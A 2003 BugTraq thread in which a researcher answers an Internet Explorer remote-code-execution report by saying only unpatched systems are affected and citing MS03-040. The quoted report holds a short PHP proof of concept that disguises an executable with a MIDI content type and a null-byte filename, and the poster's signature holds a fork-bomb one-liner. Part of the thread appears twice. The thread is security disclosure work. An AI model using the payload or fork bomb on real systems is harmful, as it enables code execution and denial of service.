BugTraq
Back to list
|
Post reply
RE: IE remote code execution
Oct 20 2003 06:42PM
Thor Larholm (thor pivx com)
A default Windows 98SE installation is several years behind in patches.
This does not reproduce on any IE browser that has been patched the last
year or so.
If in doubt about your IE patch level apply the latest cumulative patch
MS03-040, which can be found at
http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx/com/larholm/ - Get our research, join our mailinglist
-----Original Message-----
From: Marcin Ulikowski [mailto:r3b00t (at) tx (dot) pl [email concealed]]
Sent: Saturday, October 18, 2003 3:16 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: IE remote code execution
This code can execute any code remotely using IE - as you can see very
simple.
// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe"); ?> <noscript>
Here you have a demo:
http://r3b00t.tx.pl/iexec5.php
Can we expect more surprises like this one?
--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
This does not reproduce on any IE browser that has been patched the last
year or so.
If in doubt about your IE patch level apply the latest cumulative patch
MS03-040, which can be found at
http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx/com/larholm/ - Get our research, join our mailinglist
-----Original Message-----
From: Marcin Ulikowski [mailto:r3b00t (at) tx (dot) pl [email concealed]]
Sent: Saturday, October 18, 2003 3:16 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: IE remote code execution
This code can execute any code remotely using IE - as you can see very
simple.
// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe"); ?> <noscript>
Here you have a demo:
http://r3b00t.tx.pl/iexec5.php
Can we expect more surprises like this one?
--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------
[ reply ]